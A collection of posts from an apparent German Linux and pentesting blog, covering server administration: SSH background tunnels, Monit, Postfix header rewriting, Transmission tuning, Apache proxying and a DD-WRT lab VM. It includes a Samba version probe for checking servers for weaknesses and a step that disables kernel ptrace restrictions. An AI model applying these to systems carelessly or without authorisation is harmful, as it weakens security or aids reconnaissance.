Ausgabe

root@bt:~# sambaversion 192.168.15.236
Version: Samba 3.0.24

Nützlich, wenn man mehrere dutzend Samba Server per Hand auf Schwachstellen prüfen möchte.

Verwandte Themen:

1. OVH Debian from Scratch Hacks

Diese Änderungen hat den Effekt, dass ein Programm inklusive Ein- und Ausgabe plötzlich statt unterhalb einer SSH-Sitzung unterhalb einer screen Sitzung läuft.

Um sich alle Elter-/Kind-Beziehungen der laufenden Prozesse anzeigen zu lassen, eignet sich der Befehl pstree.

Installation

apt-get install reptyr

In der Datei /etc/sysctl.d/10-ptrace.conf den Wert kernel.yama.ptrace_scope auf 0 setzen oder um das Programm direkt auszuprobieren folgenden Befehl verwenden.

sudo sysctl -w "kernel.yama.ptrace_scope=0"

Verwendung

Die Prozessid (PID) des zu migrierenden Befehl mit den bekannten Werkzeugen wie top oder ps suchen und in der screen Sitzung den folgenden Befehl eingeben.

reptyr pid

Leider ist der Komfort nicht kostenlos, denn es müssen die restriktiven PTrace Einstellungen gelockert werden. Darum unbedingt die Sicherheits-Implikationen in der Datei /etc/sysctl.d/10-ptrace.conf lesen.

Verwandte Themen:

1. Transmission uTP and UDP buffer optimizations
2. Einfaches Router Failover mit gc_timeout für Debian
3. Apache 2.2 Logfiles abschalten

Monit Installation

Zuest wird die Überwachungssoftware Monit installiert.

apt-get install monit

In der Konfigurationsdatei /etc/monit/monitrc müssen drei Paragraphen wie folgt angepasst werden, indem sie einkommentiert (# Zeichen entfernen) werden.

set daemon  120
     with start delay 240
set eventqueue
     basedir /var/monit
     slots 100
set httpd port 2812 and
     use address $serverIP
     allow $lokalesSubnetz/$cidr

TVHeadend Überwachung

Eine neue Datei in /etc/monit/conf.d/tvheadend wie folgt anlegen.

check process tvheadend with pidfile /var/run/tvheadend.pid
   start program = "/etc/init.d/tvheadend start"
   stop  program = "/etc/init.d/tvheadend stop"
   if failed host localhost port 9981 then restart
   if failed host localhost port 9982 then restart
   if 5 restarts within 5 cycles then timeout

Verwandte Themen:

1. OpenSSH Tunnel im Hintergrund (inkl. Monitoring)
2. Transmission Webinterface mit Apache auf SSL umstellen
3. ICMP-Antworten mit IPTables fälschen

Dieser Beitrag ist passwortgeschützt. Um ihn anzusehen, trage das Passwort bitte hier ein:

Passwort:

Verwandte Themen:

1. Debian per USB-Stick installieren
2. OVH Debian from Scratch Hacks
3. OVH Server from Scratch mit Debian und dm-crypt Verschlüsselung

Für eine virtuelle Umgebung um Penetrationstests durchzuführen, erstelle ich zur Zeit eine komplexe Netzwerktopologie. Virtuell. Abgebildet werden soll das Netzwerk eines kleinen mittelständischen Unternehmens. Dafür soll der Router mit Internetzugang ein DD-Wrt Gerät sein. Geht das in Virtualbox?

Zuerst in der Router Datenbank nach dem Suchbegriff Alix suchen. Dort das Abbild mit dem Namen dd-wrt_public_vga.image herunterladen. Im Verzeichnis mit dem heruntergeladenen Abbild genügt es den folgenden Befehl einzugeben.

vboxmanage convertdd dd-wrt_public_vga.image dd-wrt.vdi

Mit dem Abbild kann jetzt die virtuelle Maschine erstellt werden. Um möglichst nah ein ALIX Router-Board zu simulieren müssen die Hardware-Einstellungen entsprechend gemacht werden. Da die virtuelle Maschine nur circa 10 Megabyte groß ist, gibt es die nach den Spezifikationen erstellte fertige Maschine hier zum Download.

Verwandte Themen:

1. Virtualbox Raw Disks direkt verwenden

Oft möchte man eine SSH-Verbindung im Hintergrund permanent laufen lassen. Zum Beispiel, um einen Tunnel geöffnet zu halten. Das ist mit öffentlichen Schlüsseln und den Kommandozeilen Paramtern -f und-N leicht möglich.

Hintergrund-Tunnel

Ein Befehl wie der folgende ist dazu in der Lage einen entfernten Port auf dem lokalen Computer zugänglich zu machen (wie zum Beispiel für Munin).

/usr/bin/ssh -fqnN -L4959:localhost:4949 root@irgendwo.im.internet

Die Parameter von links nach rechts haben folgende Bedeutung.

• -f – In den Hintergrund wechseln, bevor der Befehl ausgeführt wird.
• -q – Möglichst wenig Ausgaben erzeugen (die aus dem Hintergrund sowieso nicht gelesen werden können)
• -n – Leitet die Standardeingabe stdin aus /dev/null weiter und ist Voraussetzung für den Betrieb im Hintergrund
• -N – Führt auf der entfernten Seite keinen Befehl aus (der unnötig Kontingente belasten würde)
• -L4959:localhost:4949 – Leitet alle Anfragen die lokale an Port 4959 gesendet werden über den Tunnel an den entfernten Server auf dessen Adresse localhost und Port 4949 (Standardport von munin-node)

Der Befehl funktioniert und erlaubt dem lokalen Benutzer den Zugriff auf den entfernten Port mit Verschlüsselung und gegebenenfalls auch Komprimierung (dafür -C den Argumenten hinzufügen).

Monitoring

Was aber, wenn der ssh Client im Hintergrund stirbt, oder die Verbindung aus anderen Gründen beendet wird? Diesem Problem lässt sich mit dem Ubuntu und Debian eigenen start-stop-daemon und einem kleinen Skript namens sshpin beikommen.

#!/bin/bash
USERHOST="root@irgendwo.im.internet"
NAME="haxogen"
TUNNEL_ARGS=" -fqnN -L4959:localhost:4949 ${USERHOST} -MS ~/.ssh/ctl-${NAME}"

# No Changes below here, or they'll haunt you
PATH=/sbin:/usr/sbin:/bin:/usr/bin
SSH="/usr/bin/ssh"
${SSH} -S "~/.ssh/ctl-${NAME}" -O check ${USERHOST} 2> /dev/null
if [ $? -ne 0 ]; then
	echo "Tunnel ${NAME} nicht gefunden, starte neu." | logger -t sshpin
	start-stop-daemon -bv --start --exec ${SSH} -- ${TUNNEL_ARGS} | logger -t sshpin
fi

Das Skript startet den gewünschten Tunnel mit den angegebenen Argumenten, die in der Variable TUNNEL_ARGS hinterlegt werden. Der Clou: Über den wenig bekannten ControlSocket Mechanismus von OpenSSH wird vor dem Starten geprüft, ob bereits eine Instanz von ssh läuft und nur wenn diese weder eine Verbindung aufgebaut hat, noch läuft, wird eine neue Verbindung aufgebaut. Zusätzlich produziert das Skript Einträge unterhalb von /var/log die auf das Problem hinweisen und wie folgt aussehen.

Aug  2 16:16:18 firewall sshpin: Tunnel haxogen nicht gefunden, starte neu.

Das Skript kann angepasst werden und mittels dem Befehl crontab -e wie folgt in die Cron-Tabelle aufgenommen werden.

@hourly /usr/local/sbin/sshpin.haxogen

Natürlich sind auch mehrere Tunnel kein Problem, dafür wird das Skript kopiert und mit anderem Namen in die Cron-Tabelle eingefügt. Jetzt gibt es keine Ausrede mehr für unverschlüsselt lauschende Munin Instanzen, die leider noch relativ oft zu finden sind.

Verwandte Themen:

1. OpenSSH Public Keys mit ssh-agent
2. pptables: Perfect Privacy Remote Port Forward (RPF) automatisieren

Da viele E-Mail Clients diese Information nicht anzeigen, hier ein Auszug aus dem Kopf einer E-Mail.

Received: from [172.16.xxx.xxx] (b2b-46-252-xxx-xxx.unitymedia.biz [46.252.xxx.xxx])
(Authenticated sender: josen)
by outpost.paketsequenz.de (Postfix) with ESMTPSA id 8AED91032364B;
Wed, 13 Jun 2012 16:36:27 +0200 (CEST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:13.0) Gecko/20120615 Thunderbird/13.0.1

Wünschenswert ist es, dass diese Informationen anonymisiert werden. Dafür bietet Postfix die header_checks Variable in der Konfigurationsdatei main.cf an. Das Hinzufügen von Kopfzeilen-Regeln lässt sich durch Hinzufügen einer weiteren Zeile in der main.conf bewerkstelligen, die wie folgt aussieht.

header_checks = pcre:/etc/postfix/header_checks

In der angegebenen Datei können jetzt in diesem Format einfache Aktionen definiert werden. Um die Header Received und User-Agent kommplett zu entfernen reichen die folgenden Zeilen.

/^Received:/ IGNORE
/^User-Agent:/ IGNORE

Diese Lösung funktioniert, ist aber nicht elegant. Zum einen müssen Mailserver nach RFC5321 einen Received Header hinzufügen, und zum anderen werden so bearbeitete E-Mail sofort als Spam enttarnt. Wünschenswert ist eine Anonymisierung des Received Headers, ohne das RFC zu verletzen und ohne als Spam klassifiziert zu werden. Ein Received Header wie der folgende erfüllt diese Anforderungen.

Received: from [127.0.0.1] (localhost [127.0.0.1]) (Authenticated sender: josen) with ESMTPSA id 23DC81017E64E

Und so gehts:

Die folgenden Zeilen in die Datei header_checks einfügen.

/^Received: from \[.*?\] \([\w-.]* \[.*?\]\)\s+\(Authenticated sender: (\w+)\)\s+by outpost.paketsequenz.de \(Postfix\) with (E?SMTPS?A?) id ([A-F\d]+);.*?/
        REPLACE Received: from [127.0.0.1] (localhost [127.0.0.1]) (Authenticated sender: $1) by outpost.pakesequenz.de with $2 id $3
/^User-Agent:/ IGNORE

Zusätzlich muss ein Eintrag in der Postfix main.cf hinzugefügt werden, der wie folgt lautet.

smtpd_sasl_authenticated_header = yes

Verwandte Themen:

1. OpenSSH Public Keys mit ssh-agent
2. Mailscanner running with -T switch und Lock.pm

Mein Name lautet Falk, ich bin Student der Informatik an der TU-Dortmund. Ich betreibe einen Fachblog unter der Domain http://falkhusemann.de/ zu den folgenden Themen:

• Netzwerksicherheit
• Penetrationstests
• Linux

Und wie man aus Servern mit teilweise ausgefallenen Mitteln den Maximaldurchsatz herauskitzeln kann. Besonders wichtig ist mir der praktische Nutzen dessen, was ich beschreibe.

Über einen Besuch und ganz besonders Kommentare und Feedback oder Anregungen würde ich mich sehr freuen. Genauso über Themenvorschläge oder Fragen, auch gern hier über das Ubuntuusers Nachrichtensystem oder per E-Mail.

No related posts.

Nicht oft findet man Webseiten, die so viele und so fundierte Vorträge, Präsentationen und Videos zu Themen der IT-Sicherheit, Penetrationstests und sicherer Entwicklung bieten. SECDOCS ist hier eine sehr positive Ausnahme, die jedem nur empfohlen werden kann. Zu finden hier:

Hier nur drei Empfehlungen für ruhige Stunden:

• From Ring zero to UID zero
• Port scanning improved
• You must be this tall to ride the security ride

Verwandte Themen:

1. Linux-Magazin Artikel zu Elite Proxies und Perfect Privacy
2. FreeX Artikel zur Dockstar

[17:42:40.319] UDP Failed to set receive buffer: requested 4194304, got 262142 (tr-udp.c:75)
[17:42:40.319] UDP Please add the line "net.core.rmem_max = 4194304" to /etc/sysctl.conf (tr-udp.c:80)
[17:42:40.319] UDP Failed to set send buffer: requested 1048576, got 262142 (tr-udp.c:86)
[17:42:40.319] UDP Please add the line "net.core.wmem_max = 1048576" to /etc/sysctl.conf (tr-udp.c:91)

This message tries to tell us, that for some reason, Transmission would like to have 4 Megabytes of receive buffer and 1 Megabyte send buffer for it’s UDP socket. It turns out that the support for uTP, the uTorrent transport protocol, is implemented using a single socket.

By tuning the two variables, higher throughput can be achieved more easily using uTP.

Here is the relevant part from the changeset:

Since we’re using a single UDP socket to implement multiple uTP sockets,
and since we’re not always timely in servicing an incoming UDP packet,
it’s important to use a large receive buffer. The send buffer is probably
less critical, we increase it nonetheless.

Four Megabyte might seem huge for embedded clients, but running behind a fast dedicated connection, it might even be too small when Transmission has to handle hundreds of connections. I recommend to use 16 Megabyte for receive buffering and 4 for the send buffer. That is, because uTP implements a retransmission algorithm and by scaling up the buffers we achieve less retransmits because of dropped datagrams. Let’s set it up that way.

echo 'net.core.rmem_max = 16777216' >> /etc/sysctl.conf
echo 'net.core.wmem_max = 4194304' >> /etc/sysctl.conf
sysctl -p

Verwandte Themen:

1. Transmission auto-delete Quota Skript
2. Optimize maximum throughput of the modified Seagate Dockstar
3. Compiling Transmission Bittorrent for Debian

VBoxManage internalcommands createrawvmdk -filename sda3_crypt.vmdk -rawdisk /dev/mapper/sda3_crypt

Wie einzelne oder mehrere Partitionen mittels VMDK-Dateien in Virtualbox eingebunden werden können, verrät das VirtualBox Handbuch in Kapitel 9.

Verwandte Themen:

1. OVH Server from Scratch mit Debian und dm-crypt Verschlüsselung

a2enmod proxy
a2enmod proxy_http
a2enmod ssl

Als nächstes ein Seiten Template für Transmission aus einer Vorlage erzeugen.

cd /etc/apache2/sites-available/
cp default-ssl transmission
nano transmission

Folgenden Block in den Konfigurationsblock beginnend mit und t einfügen.

        ProxyRequests Off
        <Proxy *>
                Order Allow,Deny
                Allow from all
        </Proxy>

        ProxyPass /transmission http://127.0.0.1:9091/transmission
        ProxyPassReverse /transmission http://127.0.0.1:9091/transmission

Jetzt die IP-Adresse an der das Transmission Webinterface in der Konfigurationsdatei settings.json von Transmission anpassen.

    "rpc-bind-address": "127.0.0.1",

Zuletzt muss die Seiten Vorlagen aktiviert werden und Apache einmal auf die geänderte Konfiguration hingewiesen werden.

a2ensite transmission
apache2ctl restart

Verwandte Themen:

1. Transmission auto-delete Quota Skript
2. Compiling Transmission Bittorrent for Debian
3. Apache 2.2 Logfiles abschalten

In diesem Artikel werden einige Erweiterungen für das Debian from Scratch HowTo gezeigt, die alle unabhängig voneinander sind.

A1. Logdateien im Arbeitsspeicher

Wer keine Logdateien auf seinem Server liegen haben möchte, aber trotzdem nicht komplett auf Syslog verzichten kann, installiert busybox-syslogd als Ersatz für den installierten Logserver.

aptitude install busybox-syslogd

Nach der Installation können mit dem Befehl logread die Nachrichten abgerufen werden.

A2. Temporäre Dateien im Arbeitsspeicher

Um die temporären Dateien im Arbeitsspeicher zu halten, kann ein tmpfs zum Einsatz kommen. Das sollte man allerdings nur tun, wenn ausreichend Arbeitsspeicher vorhanden ist.

echo 'tmpfs /tmp tmpfs defaults,mode=777 0 0' >> /etc/fstab
mount -a

A3. Neueren Kernel verwenden

Um aktuelle Treiber und Optimierungen die seit Kernel Version 2.6.32 in die Entwicklung eingeflossen sind nutzen zu können, kann ein neuerer Kernel installiert werden. Das geht wie folgt.

echo 'deb http://backports.debian.org/debian-backports squeeze-backports main' >> /etc/apt/sources.list && apt-get update && apt-get upgrade
apt-get install -t squeeze-backports linux-image-amd64

Einige Änderungen, die für das Debian from Scratch HowTo relevant sind:

• Mehrere Kerne für Verschlüsselung (2.6.34)
• XFS Beschleunigung (2.6.35)

Verwandte Themen:

1. OVH Server from Scratch mit Debian und dm-crypt Verschlüsselung
2. Debian per USB-Stick installieren
3. Compiling Transmission Bittorrent for Debian